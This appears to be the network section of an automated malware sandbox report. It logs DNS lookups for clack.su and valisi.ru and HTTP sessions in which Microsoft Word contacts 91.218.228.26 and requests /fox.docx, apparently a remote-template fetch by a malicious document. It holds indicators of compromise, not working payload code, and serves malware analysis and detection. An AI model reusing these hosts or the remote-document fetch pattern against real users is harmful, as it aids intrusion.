        Apr 19, 2025 02:44:45.155826092 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.155875921 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.155915022 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.155915022 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.155936956 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.155973911 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.155983925 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.156048059 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.156079054 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.156893015 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.168044090 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.168219090 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.170644045 CEST4973480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.242647886 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.242692947 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.242742062 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.242790937 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.262331009 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.262389898 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.539453030 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.539482117 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.539509058 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.539511919 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.539540052 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.539550066 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.539566040 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.539589882 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.547000885 CEST804973491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.547107935 CEST4973480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.547377110 CEST4973480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.551435947 CEST804973191.218.228.26192.168.2.4
        Apr 19, 2025 02:44:45.551480055 CEST4973180192.168.2.491.218.228.26
        Apr 19, 2025 02:44:45.923831940 CEST804973491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:46.295002937 CEST804973491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:46.300976038 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:46.343974113 CEST4973480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:46.680351019 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:46.680495024 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:46.680639982 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.059813023 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.339966059 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.339998007 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.340028048 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.340125084 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.340125084 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.351562977 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.351562977 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.369962931 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.370126009 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.370465040 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.370488882 CEST804973591.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.370527029 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.370651960 CEST4973580192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.614042044 CEST804972491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:47.614109993 CEST4972480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:47.680000067 CEST4972480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:48.057131052 CEST804972491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:49.414531946 CEST804972691.218.228.26192.168.2.4
        Apr 19, 2025 02:44:49.414608002 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:44:52.926661015 CEST804973491.218.228.26192.168.2.4
        Apr 19, 2025 02:44:52.939002037 CEST4973480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:52.940320015 CEST4973480192.168.2.491.218.228.26
        Apr 19, 2025 02:44:53.316687107 CEST804973491.218.228.26192.168.2.4
        Apr 19, 2025 02:46:24.087412119 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:46:24.868294001 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:46:26.433728933 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:46:29.540301085 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:46:35.758924007 CEST4972680192.168.2.491.218.228.26
        Apr 19, 2025 02:46:48.180716991 CEST4972680192.168.2.491.218.228.26
        TimestampSource PortDest PortSource IPDest IP
        Apr 19, 2025 02:44:37.594063997 CEST6272853192.168.2.41.1.1.1
        Apr 19, 2025 02:44:38.594216108 CEST6272853192.168.2.41.1.1.1
        Apr 19, 2025 02:44:38.631468058 CEST53627281.1.1.1192.168.2.4
        Apr 19, 2025 02:44:38.699384928 CEST53627281.1.1.1192.168.2.4
        Apr 19, 2025 02:44:42.977391958 CEST5774253192.168.2.41.1.1.1
        Apr 19, 2025 02:44:43.388605118 CEST53577421.1.1.1192.168.2.4
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Apr 19, 2025 02:44:37.594063997 CEST192.168.2.41.1.1.10xcc09Standard query (0)clack.suA (IP address)IN (0x0001)false
        Apr 19, 2025 02:44:38.594216108 CEST192.168.2.41.1.1.10xcc09Standard query (0)clack.suA (IP address)IN (0x0001)false
        Apr 19, 2025 02:44:42.977391958 CEST192.168.2.41.1.1.10xe886Standard query (0)valisi.ruA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Apr 19, 2025 02:44:35.501529932 CEST1.1.1.1192.168.2.40xad67No error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
        Apr 19, 2025 02:44:35.501529932 CEST1.1.1.1192.168.2.40xad67No error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
        Apr 19, 2025 02:44:35.501529932 CEST1.1.1.1192.168.2.40xad67No error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
        Apr 19, 2025 02:44:38.631468058 CEST1.1.1.1192.168.2.40xcc09No error (0)clack.su91.218.228.26A (IP address)IN (0x0001)false
        Apr 19, 2025 02:44:38.699384928 CEST1.1.1.1192.168.2.40xcc09No error (0)clack.su91.218.228.26A (IP address)IN (0x0001)false
        Apr 19, 2025 02:44:43.388605118 CEST1.1.1.1192.168.2.40xe886No error (0)valisi.ru91.218.228.26A (IP address)IN (0x0001)false
        • clack.su
        • valisi.ru
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.44971691.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:39.011279106 CEST321OUTOPTIONS / HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-MSGETWEBURL: t
        X-IDCRL_ACCEPTED: t
        Host: clack.su
        Apr 19, 2025 02:44:39.876626968 CEST1358INHTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=eba6953baf6806e6900f830f92e49542; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_733659977=6802f1f7a44ac; expires=Sat, 19-Apr-2025 01:14:39 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://clack.su/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:39 GMT
        server: LiteSpeed
        Data Raw: 32 32 38 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 30 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 61 6e 63 65 64 20 73 74 75 64 69 6f 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 43 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 20 2f 3e 0d 0a 09 0d 0a 09 3c 21 2d 2d 20 63 73 73 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6c 61 63 6b 2e 73 75 2f 77 70 2d 63 [TRUNCATED]
        Data Ascii: 228d<!DOCTYPE html><html lang="ru"><head><meta charset="UTF-8"><meta name="viewport" content="width=1100"><meta name="author" content="Advanced studio"><title>Clack</title><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />... css --><link rel="shortcut icon" href="http://clack.su/wp-content/themes/filtrest/favicon.ico"><link href='https://fonts.googleapis.com/css?family=Fira+Sans:400,300,500,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/jquery.fancybox.css" media="screen"><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/style.css?5" media="screen">...[if lt IE 9]> <script src="http://
        Apr 19, 2025 02:44:39.876643896 CEST1358INData Raw: 68 74 6d 6c 35 73 68 69 76 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 65 37
        Data Ascii: html5shiv.googlecode.com/svn/trunk/html5.js"></script> <script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script> <![endif]-->... Google Tag Manager for WordPress by gtm4wp.com --><script data-cfasync="fa
        Apr 19, 2025 02:44:39.876655102 CEST1358INData Raw: 29 5b 30 5d 2b 22 2c 22 2b 74 5b 31 5d 2b 22 2c 22 2b 74 5b 32 5d 2b 22 2c 22 2b 74 5b 33 5d 2c 72 2e 66 69 6c 6c 54 65 78 74 28 69 28 35 35 33 35 36 2c 35 37 32 32 31 2c 35 35 33 35 36 2c 35 37 33 34 33 29 2c 30 2c 30 29 2c 61 21 3d 28 74 3d 72
        Data Ascii: )[0]+","+t[1]+","+t[2]+","+t[3],r.fillText(i(55356,57221,55356,57343),0,0),a!=(t=r.getImageData(16,16,1,1).data)[0]+","+t[1]+","+t[2]+","+t[3];case"simple":return r.fillText(i(55357,56835),0,0),0!==r.getImageData(16,16,1,1).data[0];case"unicod
        Apr 19, 2025 02:44:39.876727104 CEST1358INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a
        Data Ascii: !important;}</style><link rel='stylesheet' id='contact-form-7-css' href='http://clack.su/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3.1' type='text/css' media='all' /><link rel='stylesheet' id='wp-shop_style_main-css'
        Apr 19, 2025 02:44:39.876739025 CEST1358INData Raw: 75 30 34 33 65 5c 75 30 34 33 31 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 62 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 65 20 5c 75 30 34 33 32 20 5c 75 30 34 33 61 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 37 5c 75 30
        Data Ascii: u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u043a\u043e\u0440\u0437\u0438\u043d\u0443!","wrong_promocode":"\u041d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 \u043f\u0440\u043e\u043c\u043e\u043a\u043e\u0434","your_promocode":"\u0412\
        Apr 19, 2025 02:44:39.876749992 CEST1358INData Raw: 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 33 34 5c 75 30 34 33 65 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 61 5c 75 30 34 33 38 22 2c 22 69 74 65 6d 73 22 3a 22 5c 75 30 34 31 66
        Data Ascii: 0442\u043e\u043c \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438","items":"\u041f\u043e\u0437\u0438\u0446\u0438\u0439:","total_sum":"\u0418\u0442\u043e\u0433\u043e:","user_in":"2","submit":"\u041e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u0
        Apr 19, 2025 02:44:39.876760960 CEST1290INData Raw: 69 70 74 22 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 75 72 6c 29 7b 0a 09 69 66 28 2f 28 3f 3a 43 68 72 6f 6d 65 5c 2f 32 36 5c 2e 30 5c 2e 31 34 31 30 5c 2e 36 33 20 53 61 66 61 72 69 5c 2f 35 33 37 5c 2e 33 31 7c 57 6f 72 64 66 65 6e 63 65 54 65 73
        Data Ascii: ipt">(function(url){if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }var addEvent = function(evt, handler) {if (window.addEventListener) {document.addEventListener(evt, handl
        Apr 19, 2025 02:44:39.921441078 CEST1358INData Raw: 32 30 30 61 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 76 61 72 20 5f 5f 63 61 72 74 20 3d 20 30 3b 0a 09 76 61 72 20 5f 5f 77 20 3d 20 30 3b 0a 0a 09 43 55 52 52 20 3d 20 22 d0 a0 d1
        Data Ascii: 200a<script type="text/javascript">var __cart = 0;var __w = 0;CURR = "";jQuery(document).ready(function(){if (window.Cart !== undefined){window.__cart = new window.Cart("wpshop_minicart", "wpshop_cart");
        Apr 19, 2025 02:44:39.921463966 CEST1358INData Raw: 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29 7d 29 0d 0a
        Data Ascii: =e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(89683691, "init", { clickmap:true, trackLinks:true,
        Apr 19, 2025 02:44:40.244064093 CEST1358INData Raw: 2c 0d 0a 09 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0d 0a 09 27 68 74 74 70 73
        Data Ascii: ,j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-WQ3XLCG');</script>... End Goo
        Apr 19, 2025 02:44:40.253591061 CEST1358INData Raw: 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 09 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 28 6e 6f 73 63 72 69 70 74 29
        Data Ascii: e;visibility:hidden"></iframe></noscript>... End Google Tag Manager (noscript) --><header class="header"><div class="wrap"><a href="/" class="header-logo"></a><div class="header-phone"><div class="header-label">


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.44971991.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:40.308360100 CEST224OUTOPTIONS / HTTP/1.1
        Authorization: Bearer
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        X-IDCRL_ACCEPTED: t
        User-Agent: Microsoft Office Protocol Discovery
        Host: clack.su
        Content-Length: 0
        Connection: Keep-Alive
        Apr 19, 2025 02:44:40.837677956 CEST1358INHTTP/1.1 200 OK
        Connection: Keep-Alive
        Keep-Alive: timeout=5, max=100
        x-powered-by: PHP/5.4.45
        set-cookie: PHPSESSID=b9e6303e515dc6233f459e6662a37489; path=/
        expires: Thu, 19 Nov 1981 08:52:00 GMT
        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
        pragma: no-cache
        set-cookie: wfvt_733659977=6802f1f8a0a59; expires=Sat, 19-Apr-2025 01:14:40 GMT; path=/; httponly
        content-type: text/html; charset=UTF-8
        link: <http://clack.su/wp-json/>; rel="https://api.w.org/"
        transfer-encoding: chunked
        date: Sat, 19 Apr 2025 00:44:40 GMT
        server: LiteSpeed
        Data Raw: 32 32 38 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 31 31 30 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 41 64 76 61 6e 63 65 64 20 73 74 75 64 69 6f 22 3e 0d 0a 09 3c 74 69 74 6c 65 3e 43 6c 61 63 6b 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 22 20 63 6f 6e 74 65 6e 74 3d 22 53 4b 59 50 45 5f 54 4f 4f 4c 42 41 52 5f 50 41 52 53 45 52 5f 43 4f 4d 50 41 54 49 42 4c 45 22 20 2f 3e 0d 0a 09 0d 0a 09 3c 21 2d 2d 20 63 73 73 20 2d 2d 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6c 61 63 6b 2e 73 75 2f 77 70 2d 63 [TRUNCATED]
        Data Ascii: 228d<!DOCTYPE html><html lang="ru"><head><meta charset="UTF-8"><meta name="viewport" content="width=1100"><meta name="author" content="Advanced studio"><title>Clack</title><meta name="SKYPE_TOOLBAR" content="SKYPE_TOOLBAR_PARSER_COMPATIBLE" />... css --><link rel="shortcut icon" href="http://clack.su/wp-content/themes/filtrest/favicon.ico"><link href='https://fonts.googleapis.com/css?family=Fira+Sans:400,300,500,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/jquery.fancybox.css" media="screen"><link rel="stylesheet" href="http://clack.su/wp-content/themes/filtrest/style.css?5" media="screen">...[if lt IE 9]> <script src="http://
        Apr 19, 2025 02:44:40.837697029 CEST1358INData Raw: 68 74 6d 6c 35 73 68 69 76 2e 67 6f 6f 67 6c 65 63 6f 64 65 2e 63 6f 6d 2f 73 76 6e 2f 74 72 75 6e 6b 2f 68 74 6d 6c 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 69 65 37
        Data Ascii: html5shiv.googlecode.com/svn/trunk/html5.js"></script> <script src="http://ie7-js.googlecode.com/svn/version/2.1(beta4)/IE9.js"></script> <![endif]-->... Google Tag Manager for WordPress by gtm4wp.com --><script data-cfasync="fa
        Apr 19, 2025 02:44:40.837713003 CEST1358INData Raw: 29 5b 30 5d 2b 22 2c 22 2b 74 5b 31 5d 2b 22 2c 22 2b 74 5b 32 5d 2b 22 2c 22 2b 74 5b 33 5d 2c 72 2e 66 69 6c 6c 54 65 78 74 28 69 28 35 35 33 35 36 2c 35 37 32 32 31 2c 35 35 33 35 36 2c 35 37 33 34 33 29 2c 30 2c 30 29 2c 61 21 3d 28 74 3d 72
        Data Ascii: )[0]+","+t[1]+","+t[2]+","+t[3],r.fillText(i(55356,57221,55356,57343),0,0),a!=(t=r.getImageData(16,16,1,1).data)[0]+","+t[1]+","+t[2]+","+t[3];case"simple":return r.fillText(i(55357,56835),0,0),0!==r.getImageData(16,16,1,1).data[0];case"unicod
        Apr 19, 2025 02:44:40.837728024 CEST1358INData Raw: 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a
        Data Ascii: !important;}</style><link rel='stylesheet' id='contact-form-7-css' href='http://clack.su/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.3.1' type='text/css' media='all' /><link rel='stylesheet' id='wp-shop_style_main-css'
        Apr 19, 2025 02:44:40.837770939 CEST1358INData Raw: 75 30 34 33 65 5c 75 30 34 33 31 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 62 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 65 20 5c 75 30 34 33 32 20 5c 75 30 34 33 61 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 37 5c 75 30
        Data Ascii: u043e\u0431\u0430\u0432\u043b\u0435\u043d\u043e \u0432 \u043a\u043e\u0440\u0437\u0438\u043d\u0443!","wrong_promocode":"\u041d\u0435\u0432\u0435\u0440\u043d\u044b\u0439 \u043f\u0440\u043e\u043c\u043e\u043a\u043e\u0434","your_promocode":"\u0412\
        Apr 19, 2025 02:44:40.837795019 CEST1358INData Raw: 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 63 20 5c 75 30 34 33 34 5c 75 30 34 33 65 5c 75 30 34 34 31 5c 75 30 34 34 32 5c 75 30 34 33 30 5c 75 30 34 33 32 5c 75 30 34 33 61 5c 75 30 34 33 38 22 2c 22 69 74 65 6d 73 22 3a 22 5c 75 30 34 31 66
        Data Ascii: 0442\u043e\u043c \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438","items":"\u041f\u043e\u0437\u0438\u0446\u0438\u0439:","total_sum":"\u0418\u0442\u043e\u0433\u043e:","user_in":"2","submit":"\u041e\u0444\u043e\u0440\u043c\u0438\u0442\u044c \u0
        Apr 19, 2025 02:44:40.837820053 CEST1290INData Raw: 69 70 74 22 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 75 72 6c 29 7b 0a 09 69 66 28 2f 28 3f 3a 43 68 72 6f 6d 65 5c 2f 32 36 5c 2e 30 5c 2e 31 34 31 30 5c 2e 36 33 20 53 61 66 61 72 69 5c 2f 35 33 37 5c 2e 33 31 7c 57 6f 72 64 66 65 6e 63 65 54 65 73
        Data Ascii: ipt">(function(url){if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }var addEvent = function(evt, handler) {if (window.addEventListener) {document.addEventListener(evt, handl
        Apr 19, 2025 02:44:40.878360987 CEST1358INData Raw: 32 30 30 61 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 76 61 72 20 5f 5f 63 61 72 74 20 3d 20 30 3b 0a 09 76 61 72 20 5f 5f 77 20 3d 20 30 3b 0a 0a 09 43 55 52 52 20 3d 20 22 d0 a0 d1
        Data Ascii: 200a<script type="text/javascript">var __cart = 0;var __w = 0;CURR = "";jQuery(document).ready(function(){if (window.Cart !== undefined){window.__cart = new window.Cart("wpshop_minicart", "wpshop_cart");
        Apr 19, 2025 02:44:40.878379107 CEST1358INData Raw: 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 74 29 5b 30 5d 2c 6b 2e 61 73 79 6e 63 3d 31 2c 6b 2e 73 72 63 3d 72 2c 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6b 2c 61 29 7d 29 0d 0a
        Data Ascii: =e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)}) (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym"); ym(89683691, "init", { clickmap:true, trackLinks:true,
        Apr 19, 2025 02:44:41.070095062 CEST1358INData Raw: 2c 0d 0a 09 6a 3d 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 73 29 2c 64 6c 3d 6c 21 3d 27 64 61 74 61 4c 61 79 65 72 27 3f 27 26 6c 3d 27 2b 6c 3a 27 27 3b 6a 2e 61 73 79 6e 63 3d 74 72 75 65 3b 6a 2e 73 72 63 3d 0d 0a 09 27 68 74 74 70 73
        Data Ascii: ,j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-WQ3XLCG');</script>... End Goo
        Apr 19, 2025 02:44:41.070116043 CEST1358INData Raw: 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 09 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 28 6e 6f 73 63 72 69 70 74 29
        Data Ascii: e;visibility:hidden"></iframe></noscript>... End Google Tag Manager (noscript) --><header class="header"><div class="wrap"><a href="/" class="header-logo"></a><div class="header-phone"><div class="header-label">


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.44972491.218.228.26807720C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        TimestampBytes transferredDirectionData
        Apr 19, 2025 02:44:41.249003887 CEST464OUTHEAD /fox.docx HTTP/1.1
        Connection: Keep-Alive
        Authorization: Bearer
        User-Agent: Microsoft Office Word 2014
        X-Office-Major-Version: 16
        X-MS-CookieUri-Requested: t
        X-FeatureVersion: 1
        Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
        X-IDCRL_ACCEPTED: t
        Host: clack.su
